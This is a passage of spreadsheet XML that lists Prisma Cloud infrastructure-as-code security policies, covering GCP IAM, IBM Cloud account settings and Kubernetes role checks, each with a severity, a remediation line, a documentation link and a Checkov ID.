      <c r="AB1096" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1096" t="inlineStr">
        <is>
          <t>CKV_GCP_41</t>
        </is>
      </c>
      <c r="AD1096" t="b">
        <v>1</v>
      </c>
      <c r="AE1096" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1096" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>a74559b6-54e1-41ad-9ac3-cd7f838e8c18</t>
        </is>
      </c>
      <c r="AI1096" t="inlineStr"/>
      <c r="AJ1096" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1096" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1097" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1097" s="2" t="inlineStr"/>
      <c r="D1097" t="inlineStr"/>
      <c r="E1097" t="inlineStr"/>
      <c r="F1097" t="inlineStr"/>
      <c r="G1097" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1097" t="inlineStr">
        <is>
          <t>IaC:IAM:google-project</t>
        </is>
      </c>
      <c r="K1097" t="inlineStr">
        <is>
          <t>GCP IAM Service account does have admin privileges</t>
        </is>
      </c>
      <c r="L1097" t="inlineStr"/>
      <c r="M1097" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1097" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1097" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1097" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1097" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1097" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1097" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1097" t="b">
        <v>0</v>
      </c>
      <c r="U1097" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1097" t="inlineStr">
        <is>
          <t>IaC:IAM:google-project-iam-member</t>
        </is>
      </c>
      <c r="W1097" t="inlineStr">
        <is>
          <t>Ensure that Service Account has no Admin privileges</t>
        </is>
      </c>
      <c r="X1097" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-4</t>
        </is>
      </c>
      <c r="Y1097" t="inlineStr"/>
      <c r="Z1097" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_project_iam_member"]}</t>
        </is>
      </c>
      <c r="AA1097" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1097" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1097" t="inlineStr">
        <is>
          <t>CKV_GCP_42</t>
        </is>
      </c>
      <c r="AD1097" t="b">
        <v>1</v>
      </c>
      <c r="AE1097" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1097" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>5bf5b89b-ebc3-4d84-858d-d1c0dbc4b61d</t>
        </is>
      </c>
      <c r="AI1097" t="inlineStr"/>
      <c r="AJ1097" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1097" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" t="inlineStr"/>
      <c r="B1098" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1098" s="2" t="inlineStr"/>
      <c r="D1098" t="inlineStr"/>
      <c r="E1098" t="inlineStr"/>
      <c r="F1098" t="inlineStr"/>
      <c r="G1098" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1098" t="inlineStr">
        <is>
          <t>IaC:IAM:google-project</t>
        </is>
      </c>
      <c r="K1098" t="inlineStr">
        <is>
          <t>Project level utilization of basic roles</t>
        </is>
      </c>
      <c r="L1098" t="inlineStr"/>
      <c r="M1098" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1098" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1098" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1098" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1098" t="inlineStr"/>
      <c r="R1098" t="inlineStr"/>
      <c r="S1098" t="inlineStr"/>
      <c r="T1098" t="b">
        <v>0</v>
      </c>
      <c r="U1098" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1098" t="inlineStr">
        <is>
          <t>IaC:IAM:google-project-iam-member,google-project-iam-binding</t>
        </is>
      </c>
      <c r="W1098" t="inlineStr">
        <is>
          <t>Ensure basic roles are not used at project level.</t>
        </is>
      </c>
      <c r="X1098" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-google-cloud-117</t>
        </is>
      </c>
      <c r="Y1098" t="inlineStr"/>
      <c r="Z1098" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_project_iam_member","google_project_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA1098" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1098" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1098" t="inlineStr">
        <is>
          <t>CKV_GCP_117</t>
        </is>
      </c>
      <c r="AD1098" t="b">
        <v>1</v>
      </c>
      <c r="AE1098" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1098" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>67bcea2a-fbf7-4f74-b30a-d351c595121e</t>
        </is>
      </c>
      <c r="AI1098" t="inlineStr"/>
      <c r="AJ1098" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1098" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" t="inlineStr"/>
      <c r="B1099" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1099" s="2" t="inlineStr"/>
      <c r="D1099" t="inlineStr"/>
      <c r="E1099" t="inlineStr"/>
      <c r="F1099" t="inlineStr"/>
      <c r="G1099" t="b">
        <v>1</v>
      </c>
      <c r="H10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099" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1099" t="inlineStr">
        <is>
          <t>IaC:IAM:google-sql</t>
        </is>
      </c>
      <c r="K1099" t="inlineStr">
        <is>
          <t>A MySQL database instance allows anyone to connect with administrative privileges</t>
        </is>
      </c>
      <c r="L1099" t="inlineStr"/>
      <c r="M1099" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1099" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1099" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1099" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1099" t="inlineStr"/>
      <c r="R1099" t="inlineStr"/>
      <c r="S1099" t="inlineStr"/>
      <c r="T1099" t="b">
        <v>0</v>
      </c>
      <c r="U1099" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1099" t="inlineStr">
        <is>
          <t>IaC:IAM:google-sql-user,google-sql-database-instance</t>
        </is>
      </c>
      <c r="W1099" t="inlineStr">
        <is>
          <t>Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges</t>
        </is>
      </c>
      <c r="X1099" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges</t>
        </is>
      </c>
      <c r="Y1099" t="inlineStr"/>
      <c r="Z1099" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_sql_user","google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA1099" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1099" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1099" t="inlineStr">
        <is>
          <t>CKV2_GCP_7</t>
        </is>
      </c>
      <c r="AD1099" t="b">
        <v>1</v>
      </c>
      <c r="AE1099" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1099" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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099" t="inlineStr">
        <is>
          <t>d2a0c2ce-19b3-4894-89d5-b01e8dd0fb5d</t>
        </is>
      </c>
      <c r="AI1099" t="inlineStr"/>
      <c r="AJ1099" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1099" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" t="inlineStr"/>
      <c r="B1100" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1100" s="2" t="inlineStr"/>
      <c r="D1100" t="inlineStr"/>
      <c r="E1100" t="inlineStr"/>
      <c r="F1100" t="inlineStr"/>
      <c r="G1100" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1100" t="inlineStr">
        <is>
          <t>IaC:IAM:ibm-iam</t>
        </is>
      </c>
      <c r="K1100" t="inlineStr">
        <is>
          <t>IBM Cloud Multi-Factor Authentication (MFA) not enabled at the account level in Terraform</t>
        </is>
      </c>
      <c r="L1100" t="inlineStr"/>
      <c r="M1100" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1100" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1100" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1100" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1100" t="inlineStr"/>
      <c r="R1100" t="inlineStr"/>
      <c r="S1100" t="inlineStr"/>
      <c r="T1100" t="b">
        <v>0</v>
      </c>
      <c r="U1100" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1100" t="inlineStr">
        <is>
          <t>IaC:IAM:ibm-iam-account-settings</t>
        </is>
      </c>
      <c r="W1100" t="inlineStr">
        <is>
          <t>Ensure Multi-Factor Authentication (MFA) is enabled at the account level</t>
        </is>
      </c>
      <c r="X1100" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ibm-policies/ibm-iam-policies/bc-ibm-2-4</t>
        </is>
      </c>
      <c r="Y1100" t="inlineStr"/>
      <c r="Z1100" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["ibm_iam_account_settings"]}</t>
        </is>
      </c>
      <c r="AA1100" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1100" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1100" t="inlineStr">
        <is>
          <t>CKV2_IBM_4</t>
        </is>
      </c>
      <c r="AD1100" t="b">
        <v>1</v>
      </c>
      <c r="AE1100" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1100" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>b343370f-3190-42de-87df-62f4eb7e313b</t>
        </is>
      </c>
      <c r="AI1100" t="inlineStr"/>
      <c r="AJ1100" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1100" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" t="inlineStr"/>
      <c r="B1101" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1101" s="2" t="inlineStr"/>
      <c r="D1101" t="inlineStr"/>
      <c r="E1101" t="inlineStr"/>
      <c r="F1101" t="inlineStr"/>
      <c r="G1101" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1101" t="inlineStr">
        <is>
          <t>IaC:IAM:ibm-iam</t>
        </is>
      </c>
      <c r="K1101" t="inlineStr">
        <is>
          <t>IBM Cloud API key creation is not restricted in account settings in Terraform</t>
        </is>
      </c>
      <c r="L1101" t="inlineStr"/>
      <c r="M1101" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1101" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1101" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1101" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1101" t="inlineStr"/>
      <c r="R1101" t="inlineStr"/>
      <c r="S1101" t="inlineStr"/>
      <c r="T1101" t="b">
        <v>0</v>
      </c>
      <c r="U1101" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1101" t="inlineStr">
        <is>
          <t>IaC:IAM:ibm-iam-account-settings</t>
        </is>
      </c>
      <c r="W1101" t="inlineStr">
        <is>
          <t>Ensure API key creation is restricted in account settings</t>
        </is>
      </c>
      <c r="X1101" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ibm-policies/ibm-iam-policies/bc-ibm-2-3</t>
        </is>
      </c>
      <c r="Y1101" t="inlineStr"/>
      <c r="Z1101" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["ibm_iam_account_settings"]}</t>
        </is>
      </c>
      <c r="AA1101" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1101" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1101" t="inlineStr">
        <is>
          <t>CKV2_IBM_3</t>
        </is>
      </c>
      <c r="AD1101" t="b">
        <v>1</v>
      </c>
      <c r="AE1101" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1101" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>5aa4789c-b2e5-48d8-9a71-25d5c9edb23e</t>
        </is>
      </c>
      <c r="AI1101" t="inlineStr"/>
      <c r="AJ1101" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1101" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" t="inlineStr"/>
      <c r="B1102" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1102" s="2" t="inlineStr"/>
      <c r="D1102" t="inlineStr"/>
      <c r="E1102" t="inlineStr"/>
      <c r="F1102" t="inlineStr"/>
      <c r="G1102" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1102" t="inlineStr">
        <is>
          <t>IaC:IAM:ibm-iam</t>
        </is>
      </c>
      <c r="K1102" t="inlineStr">
        <is>
          <t>IBM Cloud Service ID creation is not restricted in account settings in Terraform</t>
        </is>
      </c>
      <c r="L1102" t="inlineStr"/>
      <c r="M1102" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1102" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1102" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1102" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1102" t="inlineStr"/>
      <c r="R1102" t="inlineStr"/>
      <c r="S1102" t="inlineStr"/>
      <c r="T1102" t="b">
        <v>0</v>
      </c>
      <c r="U1102" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1102" t="inlineStr">
        <is>
          <t>IaC:IAM:ibm-iam-account-settings</t>
        </is>
      </c>
      <c r="W1102" t="inlineStr">
        <is>
          <t>Ensure Service ID creation is restricted in account settings</t>
        </is>
      </c>
      <c r="X1102" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ibm-policies/ibm-iam-policies/bc-ibm-2-5</t>
        </is>
      </c>
      <c r="Y1102" t="inlineStr"/>
      <c r="Z1102" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["ibm_iam_account_settings"]}</t>
        </is>
      </c>
      <c r="AA1102" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1102" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1102" t="inlineStr">
        <is>
          <t>CKV2_IBM_5</t>
        </is>
      </c>
      <c r="AD1102" t="b">
        <v>1</v>
      </c>
      <c r="AE1102" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1102" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>04ec136f-73b8-41ff-8116-03f6c458b015</t>
        </is>
      </c>
      <c r="AI1102" t="inlineStr"/>
      <c r="AJ1102" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1102" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" t="inlineStr"/>
      <c r="B1103" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1103" s="2" t="inlineStr"/>
      <c r="D1103" t="inlineStr"/>
      <c r="E1103" t="inlineStr"/>
      <c r="F1103" t="inlineStr"/>
      <c r="G1103" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1103" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:AdmissionConfiguration</t>
        </is>
      </c>
      <c r="K1103" t="inlineStr">
        <is>
          <t>The admission control plugin EventRateLimit is not set</t>
        </is>
      </c>
      <c r="L1103" t="inlineStr"/>
      <c r="M1103" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1103" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1103" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1103" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1103" t="inlineStr"/>
      <c r="R1103" t="inlineStr"/>
      <c r="S1103" t="inlineStr"/>
      <c r="T1103" t="b">
        <v>0</v>
      </c>
      <c r="U1103" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1103" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:AdmissionConfiguration</t>
        </is>
      </c>
      <c r="W1103" t="inlineStr">
        <is>
          <t>Ensure that the admission control plugin EventRateLimit is set</t>
        </is>
      </c>
      <c r="X1103" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-eventratelimit-is-set</t>
        </is>
      </c>
      <c r="Y1103" t="inlineStr"/>
      <c r="Z1103" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["AdmissionConfiguration"]}</t>
        </is>
      </c>
      <c r="AA1103" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1103" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1103" t="inlineStr">
        <is>
          <t>CKV_K8S_78</t>
        </is>
      </c>
      <c r="AD1103" t="b">
        <v>1</v>
      </c>
      <c r="AE1103" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1103" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>9780e1eb-3d72-41be-90ad-65fab2400917</t>
        </is>
      </c>
      <c r="AI1103" t="inlineStr"/>
      <c r="AJ1103" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1103" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1104">
      <c r="A1104" t="inlineStr"/>
      <c r="B1104" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1104" s="2" t="inlineStr"/>
      <c r="D1104" t="inlineStr"/>
      <c r="E1104" t="inlineStr"/>
      <c r="F1104" t="inlineStr"/>
      <c r="G1104" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1104" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRole</t>
        </is>
      </c>
      <c r="K1104" t="inlineStr">
        <is>
          <t>Kubernetes ClusterRoles that grant permissions to approve CertificateSigningRequests are not minimized</t>
        </is>
      </c>
      <c r="L1104" t="inlineStr"/>
      <c r="M1104" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1104" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1104" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1104" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1104" t="inlineStr"/>
      <c r="R1104" t="inlineStr"/>
      <c r="S1104" t="inlineStr"/>
      <c r="T1104" t="b">
        <v>0</v>
      </c>
      <c r="U1104" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1104" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRole</t>
        </is>
      </c>
      <c r="W1104" t="inlineStr">
        <is>
          <t>Minimize ClusterRoles that grant permissions to approve CertificateSigningRequests</t>
        </is>
      </c>
      <c r="X1104" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized</t>
        </is>
      </c>
      <c r="Y1104" t="inlineStr"/>
      <c r="Z1104" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ClusterRole"]}</t>
        </is>
      </c>
      <c r="AA1104" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1104" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1104" t="inlineStr">
        <is>
          <t>CKV_K8S_156</t>
        </is>
      </c>
      <c r="AD1104" t="b">
        <v>1</v>
      </c>
      <c r="AE1104" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1104" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>a94ddca0-7fbe-40ea-8a87-ce6c6c377c9f</t>
        </is>
      </c>
      <c r="AI1104" t="inlineStr"/>
      <c r="AJ1104" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1104" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" t="inlineStr"/>
      <c r="B1105" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1105" s="2" t="inlineStr"/>
      <c r="D1105" t="inlineStr"/>
      <c r="E1105" t="inlineStr"/>
      <c r="F1105" t="inlineStr"/>
      <c r="G1105" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1105" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRole</t>
        </is>
      </c>
      <c r="K1105" t="inlineStr">
        <is>
          <t>Kubernetes ClusterRoles that grant control over validating or mutating admission webhook configurations are not minimized</t>
        </is>
      </c>
      <c r="L1105" t="inlineStr"/>
      <c r="M1105" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1105" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1105" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1105" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1105" t="inlineStr"/>
      <c r="R1105" t="inlineStr"/>
      <c r="S1105" t="inlineStr"/>
      <c r="T1105" t="b">
        <v>0</v>
      </c>
      <c r="U1105" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1105" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRole</t>
        </is>
      </c>
      <c r="W1105" t="inlineStr">
        <is>
          <t>Minimize ClusterRoles that grant control over validating or mutating admission webhook configurations</t>
        </is>
      </c>
      <c r="X1105" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized</t>
        </is>
      </c>
      <c r="Y1105" t="inlineStr"/>
      <c r="Z1105" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ClusterRole"]}</t>
        </is>
      </c>
      <c r="AA1105" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1105" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1105" t="inlineStr">
        <is>
          <t>CKV_K8S_155</t>
        </is>
      </c>
      <c r="AD1105" t="b">
        <v>1</v>
      </c>
      <c r="AE1105" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1105" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>8657200c-106e-4815-9572-b722474d1353</t>
        </is>
      </c>
      <c r="AI1105" t="inlineStr"/>
      <c r="AJ1105" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1105" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" t="inlineStr"/>
      <c r="B1106" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1106" s="2" t="inlineStr"/>
      <c r="D1106" t="inlineStr"/>
      <c r="E1106" t="inlineStr"/>
      <c r="F1106" t="inlineStr"/>
      <c r="G1106" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1106" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRole,Role</t>
        </is>
      </c>
      <c r="K1106" t="inlineStr">
        <is>
          <t>Kubernetes Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings are not minimized</t>
        </is>
      </c>
      <c r="L1106" t="inlineStr"/>
      <c r="M1106" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1106" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1106" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1106" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1106" t="inlineStr"/>
      <c r="R1106" t="inlineStr"/>
      <c r="S1106" t="inlineStr"/>
      <c r="T1106" t="b">
        <v>0</v>
      </c>
      <c r="U1106" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1106" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ClusterRole,Role</t>
        </is>
      </c>
      <c r="W1106" t="inlineStr">
        <is>
          <t>Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings</t>
        </is>
      </c>
      <c r="X1106" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
